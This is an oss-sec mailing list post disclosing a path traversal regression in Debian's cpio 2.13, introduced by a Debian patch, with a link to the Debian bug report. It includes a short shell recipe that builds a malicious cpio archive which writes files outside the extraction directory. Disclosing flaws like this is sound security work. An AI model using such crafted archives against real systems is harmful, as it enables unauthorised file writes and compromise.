oss-sec mailing list archives
Security vulnerability in Debian's cpio 2.13
From: Ingo Brückl <ib () oddnet de>
Date: Thu, 21 Dec 2023 17:44:50 +0100
Debian has applied patch "revert-CVE-2015-1197-handling" to cpio (2.13+dfsg-7.1) to "Fix a regression in handling of CVE-2015-1197 & --no-absolute-filenames by reverting part of an upstream commit." and to close Debian bugs #946267 ("cpio -i --no-absolute-filenames breaks symlinks starting with / or /..") and #946469 ("initramfs-tools-core: unmkinitrams creates broken binaries"). This patch made Debian cpio 2.13 vulnerable to path traversal. The vulnerability has been reported to the Debian bug tracking system: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1059163 Instructions to craft a cpio archive to demonstrate the vulnerability: mkdir test_cpio ln -sf /tmp/ test_cpio/tmp echo "TEST Traversal" > test_cpio/tmpYtrav.txt cd test_cpio/ ls | cpio -ov > ../trav.cpio cd ../ sed -i s/"tmpY"/"tmp\/"/g trav.cpio Even cpio -id --no-absolute-filenames -I trav.cpio doesn't prevent path traversal with Debian's cpio, although it does with the original cpio. Ingo
Current thread:
- Security vulnerability in Debian's cpio 2.13 Ingo Brückl (Dec 21)